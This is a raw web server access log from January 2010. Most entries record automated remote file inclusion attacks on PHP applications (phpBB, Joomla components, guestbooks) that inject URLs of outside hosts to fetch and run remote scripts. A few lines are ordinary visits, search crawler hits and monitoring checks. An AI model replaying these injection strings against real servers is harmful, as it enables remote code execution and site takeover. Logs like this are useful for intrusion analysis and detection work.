189.14.103.146 - - [05/Jan/2010:03:05:55 -0500] "GET /logs/error_log.Q109101500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:05:56 -0500] "GET /logs/access_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:05:56 -0500] "GET /logs/access_log.Q109122500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:05:56 -0500] "GET /logs/error_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:05:57 -0500] "GET /logs/access_log.Q109110800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:05:57 -0500] "GET /logs/access_log.Q109103100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:05:57 -0500] "GET /logs/error_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:05:57 -0500] "GET /logs/error_log.Q109101300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:07 -0500] "GET /logs/access_log.Q109110100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:07 -0500] "GET /logs/access_log.Q109071400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.228.161.3 - - [05/Jan/2010:03:06:23 -0500] "GET /logs/access_log.Q109112100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:26 -0500] "GET /logs/error_log.Q109071400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:26 -0500] "GET /logs/error_log.Q109110800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:26 -0500] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.228.161.3 - - [05/Jan/2010:03:06:27 -0500] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
189.14.103.146 - - [05/Jan/2010:03:06:36 -0500] "GET /logs/access_log.Q109112100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
189.14.103.146 - - [05/Jan/2010:03:06:40 -0500] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:44 -0500] "GET /logs/error_log.Q109062900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:44 -0500] "GET /logs/error_log.Q109122500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:48 -0500] "GET /logs/error_log.Q109103100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:48 -0500] "GET /logs/access_log.Q109112600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:52 -0500] "GET /logs/access_log.Q109110800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:52 -0500] "GET /logs/error_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:52 -0500] "GET /logs/access_log.Q109103100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:53 -0500] "GET /logs/error_log.Q109101300%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
119.198.187.8 - - [05/Jan/2010:03:06:56 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.198.187.8 - - [05/Jan/2010:03:06:56 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
220.90.213.231 - - [05/Jan/2010:03:06:56 -0500] "GET /logs/access_log.Q109110100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:06:57 -0500] "GET /logs/access_log.Q109071400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
119.198.187.8 - - [05/Jan/2010:03:06:58 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.198.187.8 - - [05/Jan/2010:03:06:58 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.198.187.8 - - [05/Jan/2010:03:07:00 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.198.187.8 - - [05/Jan/2010:03:07:00 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
220.90.213.231 - - [05/Jan/2010:03:07:00 -0500] "GET /logs/error_log.Q109090800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:00 -0500] "GET /logs/error_log.Q109110100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
119.198.187.8 - - [05/Jan/2010:03:07:01 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
119.198.187.8 - - [05/Jan/2010:03:07:01 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
220.90.213.231 - - [05/Jan/2010:03:07:04 -0500] "GET /logs/error_log.Q109071400%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:04 -0500] "GET /logs/error_log.Q109110800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:04 -0500] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:23 -0500] "GET /logs/error_log.Q109103100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:23 -0500] "GET /logs/access_log.Q109112600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:24 -0500] "GET /logs/access_log.Q109092800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:25 -0500] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:25 -0500] "GET /logs/access_log.Q109090800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:27 -0500] "GET /logs/error_log.Q109090800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:27 -0500] "GET /logs/error_log.Q109110100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:42 -0500] "GET /logs/access_log.Q109092800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:42 -0500] "GET /logs/access_log.Q109090800%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:07:42 -0500] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.165.193.182 - - [05/Jan/2010:03:08:07 -0500] "GET /logs//rss.php?site=http127001wagora&bn=http://www.westchesterinvisalign.com/bash/baner.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
82.165.193.182 - - [05/Jan/2010:03:08:07 -0500] "GET //rss.php?site=http127001wagora&bn=http://www.westchesterinvisalign.com/bash/baner.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
82.165.193.182 - - [05/Jan/2010:03:08:07 -0500] "GET /logs/access_log.Q109080100//rss.php?site=http127001wagora&bn=http://www.westchesterinvisalign.com/bash/baner.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:08:32 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:08:32 -0500] "GET /logs/access_log.Q109111200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:08:32 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:03:08:48 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.218.126.236 - - [05/Jan/2010:03:08:57 -0500] "GET /logs/error_log.Q109111200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:09:00 -0500] "GET /logs/access_log.Q109112100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:09:00 -0500] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:03:09:19 -0500] "GET /logs/error_log.Q109060400 HTTP/1.0" 200 2511221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.228.161.3 - - [05/Jan/2010:03:09:23 -0500] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.828"
67.195.114.54 - - [05/Jan/2010:03:09:22 -0500] "GET /logs/error_log.Q109060400 HTTP/1.0" 200 2511221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.22.197.240 - - [05/Jan/2010:03:10:26 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:10:29 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:10:41 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:10:41 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:10:51 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:10:51 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:10:51 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:10:51 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:10:51 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:10:51 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:11:00 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:11:00 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:11:00 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:11:01 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:03:09:57 -0500] "GET /logs/access_log.Q109120300 HTTP/1.1" 200 5973546 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.195.114.54 - - [05/Jan/2010:03:12:36 -0500] "GET /Includes/ HTTP/1.0" 200 220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.90.213.231 - - [05/Jan/2010:03:12:43 -0500] "GET /logs/access_log.Q109112100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.90.213.231 - - [05/Jan/2010:03:12:44 -0500] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.38.64.117 - - [05/Jan/2010:03:13:00 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:03:13:00 -0500] "GET //guestbook1//admin.php?include_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:03:13:00 -0500] "GET /logs/error_log.Q109102600//guestbook1//admin.php?include_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:03:13:01 -0500] "GET /logs/error_log.Q109120300//guestbook1//admin.php?include_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:03:13:11 -0500] "GET /logs//components/errors.php?error=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:03:13:11 -0500] "GET //components/errors.php?error=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:03:13:11 -0500] "GET /logs/access_log.Q109080200//components/errors.php?error=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:03:13:18 -0500] "GET /logs/access_log.Q109121000//components/errors.php?error=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.834"
209.59.12.99 - - [05/Jan/2010:03:13:44 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.19.194.26 - - [05/Jan/2010:03:14:08 -0500] "GET /logs//include/prodler.class.php?sPath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:14:08 -0500] "GET /logs/access_log.Q109122000%20%20//include/prodler.class.php?sPath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:14:08 -0500] "GET //include/prodler.class.php?sPath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:14:08 -0500] "GET /logs/access_log.Q109090900%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:14:08 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
